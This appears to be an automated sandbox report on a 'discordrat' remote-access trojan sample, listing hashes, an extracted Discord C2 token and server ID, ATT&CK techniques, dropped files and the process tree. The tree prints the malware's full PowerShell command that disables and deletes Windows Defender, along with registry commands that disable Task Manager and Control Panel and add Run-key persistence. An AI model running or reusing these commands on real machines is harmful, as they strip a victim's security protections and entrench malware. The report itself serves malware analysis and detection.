discordrat | 2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747

Analysis

max time kernel
93s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2024 22:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
Size

663KB
MD5

043e699dbf3d88b6cca5fbe64229ba27
SHA1

50661d32315985eab2a70f1d1f6435b9563ca237
SHA256

2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747
SHA512

04f23cfa08684ce109685bf2068211731018a85bb588cff9de67faca8ecc6e3e02b150a656f91b55557e5f4a949400f90da19f8c37f5abfac034e68e4cc633c2
SSDEEP

6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJM1tc2uQNQ5rHbIOohWy0f:3BdlwHRn+WlYV+Rp2yEM1tc2uYXOos

Score

10^/10

discordrat defense_evasion discovery evasion persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIwNzY2MzY3MDU0MTE2MDUwOQ.Gd6pNB.ScrscETWuXpifr43j4YDLQN_-m1c2UlONmnRmo
server_id
1097447165732868126

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/files/0x0007000000023ca2-18.dat	disable_win_def
behavioral2/memory/4380-24-0x0000000000570000-0x00000000005BA000-memory.dmp	disable_win_def
behavioral2/files/0x0007000000023ca4-43.dat	disable_win_def

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	executer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe

Executes dropped EXE 3 IoCs

pid	Process
1848	bang_executor.exe
4380	executer.exe
5092	bang_executor.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\bang_executor.exe"	reg.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2940	powershell.exe
2940	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1848	bang_executor.exe
Token: SeDebugPrivilege	5092	bang_executor.exe
Token: SeDebugPrivilege	2940	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 4832 wrote to memory of 1988	4832	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	86
PID 4832 wrote to memory of 1988	4832	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	86
PID 4832 wrote to memory of 1988	4832	2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe	86
PID 1988 wrote to memory of 1848	1988	cmd.exe	89
PID 1988 wrote to memory of 1848	1988	cmd.exe	89
PID 1988 wrote to memory of 4380	1988	cmd.exe	90
PID 1988 wrote to memory of 4380	1988	cmd.exe	90
PID 1988 wrote to memory of 2384	1988	cmd.exe	92
PID 1988 wrote to memory of 2384	1988	cmd.exe	92
PID 1988 wrote to memory of 2384	1988	cmd.exe	92
PID 1988 wrote to memory of 3964	1988	cmd.exe	94
PID 1988 wrote to memory of 3964	1988	cmd.exe	94
PID 1988 wrote to memory of 3964	1988	cmd.exe	94
PID 1988 wrote to memory of 948	1988	cmd.exe	96
PID 1988 wrote to memory of 948	1988	cmd.exe	96
PID 1988 wrote to memory of 948	1988	cmd.exe	96
PID 4380 wrote to memory of 5060	4380	executer.exe	98
PID 4380 wrote to memory of 5060	4380	executer.exe	98
PID 2384 wrote to memory of 3496	2384	cmd.exe	99
PID 2384 wrote to memory of 3496	2384	cmd.exe	99
PID 2384 wrote to memory of 3496	2384	cmd.exe	99
PID 3964 wrote to memory of 3168	3964	cmd.exe	100
PID 3964 wrote to memory of 3168	3964	cmd.exe	100
PID 3964 wrote to memory of 3168	3964	cmd.exe	100
PID 4380 wrote to memory of 828	4380	executer.exe	102
PID 4380 wrote to memory of 828	4380	executer.exe	102
PID 948 wrote to memory of 4360	948	cmd.exe	104
PID 948 wrote to memory of 4360	948	cmd.exe	104
PID 948 wrote to memory of 4360	948	cmd.exe	104
PID 2384 wrote to memory of 5044	2384	cmd.exe	105
PID 2384 wrote to memory of 5044	2384	cmd.exe	105
PID 2384 wrote to memory of 5044	2384	cmd.exe	105
PID 948 wrote to memory of 5092	948	cmd.exe	106
PID 948 wrote to memory of 5092	948	cmd.exe	106
PID 828 wrote to memory of 2940	828	cmd.exe	107
PID 828 wrote to memory of 2940	828	cmd.exe	107

C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe
"C:\Users\Admin\AppData\Local\Temp\2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
    bang_executor.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe
    executer.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4380
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
      4⤵
      PID:5060
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
      4⤵
      Suspicious use of WriteProcessMemory
      PID:828
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ep bypass .\test.ps1;
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K instaling.bat
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3496
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K mgr.bat
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3964
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K microsoft.bat
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat

Filesize
121B

MD5
140d432dacc3a675f31bfc80171fc928

SHA1
6b886ca57fc64d079f943fae06210d41341b33b2

SHA256
dcb23167ac8eccdb760afc56b99ef4019cbcf9dbcdf1174f2040b361f3b4f534

SHA512
b925bec48d68ec12e6829e07c6d45b313505164d60444dd556f3f6e1739bdb4192e1c2a7d1f14f53c8c77086e49ab9f419df11e9b6c054906d05d5c38ba4cf6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe

Filesize
343KB

MD5
e1ead094e52097b884389a8064b15e2b

SHA1
894f8db63a8f41f913a5f5c69d1199ec8ae3f213

SHA256
82c67ed82a7a319c0ae30f92c187ea0150ac6ba6ef63d2d3b4fc999bb01d064f

SHA512
96bf368c771bbc9db1a23b8e57906530936372aa15c963ef370ef47a13328fc67201d4d184911679536ce952869a4bc2abdc42403e1978028c57c27b154ecea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe

Filesize
274KB

MD5
88e22186f196cc0e1e2d500eeac57337

SHA1
e5e0bd98f08de159880b58e918959c358efca6b1

SHA256
5dca36ce98da2185693a87305811cf7aeee7b3279298345e4d1f4d37efe0250b

SHA512
462fe680ba12da5fedec11d88ea17f9f65b80ee916f665d6208d9dcf3d3494c805d11aaf899914f621835b0a61d014000243fe01b2e00ca34681afc415a33ee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\instaling.bat

Filesize
269B

MD5
7e86beb4c1ebeb8ab77f1d68f14fec37

SHA1
c9a40241b2407d9492c41bcd70686d6fd829f3bc

SHA256
5a60b3cc91782e0a7c8cd52701e603299b62c87c0b593d5ac85ebce74321f2f3

SHA512
653ce9cbcf427be11042340859f61cfa30105332acad13b94e2d509960ba04d67610276b6a7128d56aa139098b0c1c8d67973fff7a97976acfb33d474073d849

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\mgr.bat

Filesize
111B

MD5
9a4a032d9a604c9b7c1e843c6455140e

SHA1
dbe7a610e1697e62722efb59ad3bc03afcfd900f

SHA256
dc0890d3d4a7370ece704eb075c05418795c47332dffcc277896e806c38c3db0

SHA512
ca045ec576eb55c442959c2709148392fe53f1613b6c5dc9cb5b43592d77563479233c7dee6e0832e5a95528e1653ba6b73c73a3dc4ed841a7529e6344eccb3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat

Filesize
288B

MD5
77c6969c2641f3c5d6ed44a4feb48f25

SHA1
9ff375b96cd38ca40a9694698e9aa3be1fc1d52e

SHA256
33dbedbe9fb27de7c1f75d742e3992675c4d683073538b02a8d69922f366cd6a

SHA512
530f05816854791916b3409161a1e488d661e02340c4ae7b442ede31f7b21f70a6b5cfd5d1b330ddd202e104b5f4219253c537d32770e0fddf0640d178eefa68

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hd4xozja.ruf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\test.ps1

Filesize
3KB

MD5
3499745c76f31429c42a3b34d8cc0af6

SHA1
f9125070406cc2a2a6cf092f3ed3d36751107224

SHA256
3c2eb503e7d32f48b06199e6c1c350e559c316fd9f6f17f040e41079f44fb6e3

SHA512
1757ee5f42a8681e84ce3070d7ee164107ebc284bc0eb5424a4e71fe71e122eeadb28d63535d88557c0c49c687ce4514e8d387781ec7c68e1171994183dde1fb

Download Submit
memory/1848-20-0x000002363ECA0000-0x000002363ECFA000-memory.dmp

Filesize
360KB

Download
memory/1848-25-0x00007FFFABEB0000-0x00007FFFAC971000-memory.dmp

Filesize
10.8MB

Download
memory/1848-22-0x00000236592C0000-0x0000023659482000-memory.dmp

Filesize
1.8MB

Download
memory/1848-32-0x0000023659AC0000-0x0000023659FE8000-memory.dmp

Filesize
5.2MB

Download
memory/1848-21-0x00007FFFABEB3000-0x00007FFFABEB5000-memory.dmp

Filesize
8KB

Download
memory/1848-46-0x00007FFFABEB0000-0x00007FFFAC971000-memory.dmp

Filesize
10.8MB

Download
memory/2940-33-0x00000200F6A90000-0x00000200F6AB2000-memory.dmp

Filesize
136KB

Download
memory/4380-24-0x0000000000570000-0x00000000005BA000-memory.dmp

Filesize
296KB

Download